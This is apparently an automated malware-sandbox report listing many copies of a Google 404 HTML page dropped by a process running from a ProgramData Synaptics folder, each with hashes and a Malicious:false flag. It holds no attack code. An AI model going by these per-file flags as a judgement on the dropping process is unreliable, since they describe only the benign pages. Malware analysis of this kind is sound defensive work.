                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265415567525308
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                              MD5:96A8008E3C507089C9809834613D4E5D
                                                                                                              SHA1:EA04CFBDFF212B558B5FB41CEF2741A28513FEB4
                                                                                                              SHA-256:9B3E75784F2E655C48BDCD9F4534D9575B2E86E9AD031E0B4DC078124D527B91
                                                                                                              SHA-512:A65E9177634AB6C9369BCF5B7BB9E8257F11CF18D3BA2F31089A76C8AE322E0FF15972CC16819B223D60059EB4F10F30B146A01F49B339006FC44615EE8520C4
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PQBuoXa0kH-bgA6YziGKeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259210158642762
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0SswXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dsi+pAZewRDK4mW
                                                                                                              MD5:27B1DA1C297651B5BA69368F32A151C3
                                                                                                              SHA1:77F9110F1300E94C14C31811ABF8EE5E721BB9B4
                                                                                                              SHA-256:0A1074E93AA61E32D20055B1711DE6C6128A6B1EC7CE92911141F12F4D06CBF5
                                                                                                              SHA-512:DAAD02647E1EE3A987E32FF6A0C38FAEB39EB01BF3A0039719544E6978770FB88BB08C2E5C133273B567E885B1C55A45AABB50FDE000C6D43D814F8575E5A3ED
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DIubcWcVtcyc4AGkzryIiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259470955268102
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0XUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+oU+pAZewRDK4mW
                                                                                                              MD5:F0C3883B89A19E2F8987E63ADEB5044A
                                                                                                              SHA1:3D5D84EF21A22C40B7970165AFDE13009388F248
                                                                                                              SHA-256:86D960E69AB7C645936B2E62D947ADE86C9A8C29C61AE243E19E36F3ADE25EF5
                                                                                                              SHA-512:5A4ACAFB0956D7EB9EDE68CA2053E05E02F5125E28FF0B9A8B9052A86C4CEB2868410EDB6ECE49268037B585E50DD8B77B6A082D95FEEE01EC878FFF8F1DC18E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QqEM-4J6tblyXrgg03E5qQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.252312285675696
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0dzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Uz+pAZewRDK4mW
                                                                                                              MD5:B46FAE3EFBED49A81C325A7CC6DB57DC
                                                                                                              SHA1:ADE951A7929758D89569B50C8E3AAC1DA16BF631
                                                                                                              SHA-256:5DA39127B638C4129B955C2275982D4E1DD69D38F32E8A5A2F00293128608775
                                                                                                              SHA-512:4DF45EF28CF2DE8466E0FAF9B3FBCB0B64765B4DF0A7ABDC24B1C7C9A3BB5167131BB2186648BDFEB9D97D4E208C46A1E2364B2AD601DFD5DEC4D15E8606D5B2
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fMYRyi3oM5RxgsR0U2J2tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254699799943074
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0oRgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NS+pAZewRDK4mW
                                                                                                              MD5:7249C6152E3C56C8226BF8004CED3197
                                                                                                              SHA1:309B73995C0FC892A958E298D3505D782FD1548A
                                                                                                              SHA-256:F4F1EDD0DEE3922C362D6A767EF7480DDC54086373177B4C59A94721D948CA37
                                                                                                              SHA-512:2A39815D8EF9A3371657F7E7FB7BFD799081F43A9CEB74ABE8A14A9DC7FF970012CA73296DE684903DC657AC947997673F0AC195ABF8E36DA11F911B0AE8FD04
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iLtvbEpbxmJkgC6w2HAWxg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256314458524747
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0vgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                              MD5:40FAECB7EAECFA94E202FE38A1EF095B
                                                                                                              SHA1:1D486095F6410BC2D3478EEFA948191CED4668F5
                                                                                                              SHA-256:247883E236723FE074F5D14A0220293EB9438B17A87E8BAB13A35F7E22680520
                                                                                                              SHA-512:BD2D5592B347796A09271F118B3094808A8444B315C715683A878452375D3A6CB59EE23095BEBB755715BEF151E2158C55954BDA6D88E16D092F450CD13F91EC
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ULdgTPafgs1b0HJcuySmIQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.249640824129183
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0PBo5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                              MD5:C5E3AE871B696550D1DF235393055072
                                                                                                              SHA1:01EF662E8EC52D15A418251FCF07AF830F641670
                                                                                                              SHA-256:BBF3425276C836431D92A7CF629F4BCDFEBFE9A779C7227EBD3D9920C93E5C46
                                                                                                              SHA-512:17C26930D40AB4ADDF7D0B8FC7FF037E13805FDD36A6CE6A161B62E5864D797B0F942437B1D4B9B07394DD974C0E66B8108E35AAF35D40A3D55C36E91DE0DF09
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9eWiuLrM8fNFM7ix4b2unw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.281051276213121
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ocSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hc+pAZewRDK4mW
                                                                                                              MD5:175279CA2F3BF999CFDAC49A10A94D5A
                                                                                                              SHA1:1012F42EC412A004623A07B2EFBFF24BD90037F9
                                                                                                              SHA-256:4A8A7141363DC1C63530F542924E14783D0F0FC71EDB2B72C25EB30E5892DDE6
                                                                                                              SHA-512:F8781C25121AD50F46EBC83CDE4103AF40A0F8A1A428D4FE5641F024020C9530B12925B7040595C8A85AD34D5BFB042B225172495C06130B4AC9D47625873F36
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Iyv6N3YPBDKJX1mP-LlQ0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.246720831445737
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0gycSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++c+pAZewRDK4mW
                                                                                                              MD5:84FD52087E2E356D7C72657B94596363
                                                                                                              SHA1:D7BCA2E00D30736AD40EA024803D490787DBC8E7
                                                                                                              SHA-256:4CDCC2BA31836973A20ABA369ABD35298F01C49E5F50AAFB522C05844307658C
                                                                                                              SHA-512:EAE3AE794EC3D600D3E94108BD88723BCC28614048402D0396FA5294E1078CB7B1EB7B7C323FCCC17487B53B90A0A89B6D2F086CEEFB2C961BE7D6319099F823
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EkYlb79xByrcqB2ibgcBaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.247840180394354
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+09O2SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J2+pAZewRDK4mW
                                                                                                              MD5:31515351FAB9022D93406256ED139550
                                                                                                              SHA1:0FDF5926BB615D06BC10F86E3940A9AE41B2A19B
                                                                                                              SHA-256:D07C5F235F3DBE2E1C8769A97C3618DA23DE0098D096D41A04D9D6C9C95BDBC3
                                                                                                              SHA-512:1A9A40D65C5899C14F2E0A9081A6E1FB794B470AD22E8C14B295C9E894670879BEAEA2759C4C238AA6363A398578C5FBBA374AC6ACB21024CBDDAD3680B78F79
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PxmdigLaxMzhKJxuwo9kTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260331135241122
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0e3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                              MD5:8F16B0DBABFEF1F85B69400F961A9366
                                                                                                              SHA1:FE18A5DDC855E57FE2FA14750A22E960B913FEE2
                                                                                                              SHA-256:A1BB0F25B99B3F615A9D6D5DBF1CA92E39D5C24D3A87A0E166FB7B41234C6766
                                                                                                              SHA-512:DB654AE30C72AE34DEA97E2E3ACB6C75CEDF7900E09C57B7609427AF2252AA8591B9001B4BF4DB5357ECBB04C31B20F584DDAB3C171313E5725B877206FA57A7
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1dRz7dAVH3iNRUNsnI01sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258667164663006
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+08OjSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+LW+pAZewRDK4mW
                                                                                                              MD5:6F27D94CF121AD32F6A81ACAE996AFB6
                                                                                                              SHA1:1981E49AB834F053FBA10455A2D387DBC2993CD2
                                                                                                              SHA-256:E1BE011DC606B0F1ABB3F4D132F9EE587DFF983FA7310F1827D61B533CF27382
                                                                                                              SHA-512:AA7DDD620E9CCE651C71AA821064B7EBAA5DB8C2EFD40F060AF2B717DAB9FC7DBDFB9264DC61E737BAA8E163BCC7BA37FA939FA37B67E5E3A1F4A5FB24AF6066
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Cqkcee9V1C_mDlvHHT7yHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259886237338167
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                              MD5:F648C8EE79379BD6DCE81EF465ED9DDE
                                                                                                              SHA1:740B2BBB38D0182F8DF5150BEDF670835F5BE4C8
                                                                                                              SHA-256:DE8B99B0D1A0496FEBAB19C8B983D70EEC0EE86190F890413E923605A7F35FA5
                                                                                                              SHA-512:DCDDC1121CC7C313C455FF1604EC4B401E957A2C074670469D91B0FC04366D163BA530C695AF35886DB761FD23909BA9F0F0BCB34EC538DB56E8C5FF661ECE3F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_gw7Zdy0-UYigXXO-zALIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267003614244939
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                              MD5:352A406AED3258A191077266F585EC75
                                                                                                              SHA1:95444EF9F1078262A7D43DCAC34919A3F8CEA105
                                                                                                              SHA-256:C902CD6BDD37984ED333C5C16F8773BEEA5E5C6066157BD1BF69A3550DB973A3
                                                                                                              SHA-512:B813F5D0DD51805BAB207F0E4537E1B8274736073E5B95E8A900BC3840E6E5F7F9358A9F9803D221D6AA4572D40A53D947CA39EC2116AFFC93D8FCF6635FF761
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7ssQIaBJ689g4w3vLu3J_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.269540419106675
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                              MD5:D6884147B47D6438A4EEABDAC5769C57
                                                                                                              SHA1:89B4FB8E147ECB35801A3E658311BD9BFC5D22D2
                                                                                                              SHA-256:92AC7341C2D4083801172482D1AC004C7A84091EE39B340615B90812A851917F
                                                                                                              SHA-512:1630EC2AA662B7627541E2833106B5A22A880224F66B327CF88CB7F9233A69BDAE772F71F7D2126242672D54C97E9D398B73EC90565C335D86880DFB3A846EF2
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jYLHdulSsVq1BjQUpfYePw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.255037575942708
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                              MD5:DF9755B8CF8E0CC42EAE9CBA4D4EEB16
                                                                                                              SHA1:5EB32D1017560092570C4B20A05A4D779FE0F07B
                                                                                                              SHA-256:F512F32CF08A05DC2EF731CB49EAA849D0F41E024CC116FCFA9ADD07CD7AE62B
                                                                                                              SHA-512:8737F839E661B0E0EF2F70D23FBF14925D1F8F4E2AFB9C784CCA8E4481A12B2C4DF5F8885D437CC0B961FF85E29254183DF5F3A083E28A4C2315AE195FE845BE
                                                                                                              Malicious:false
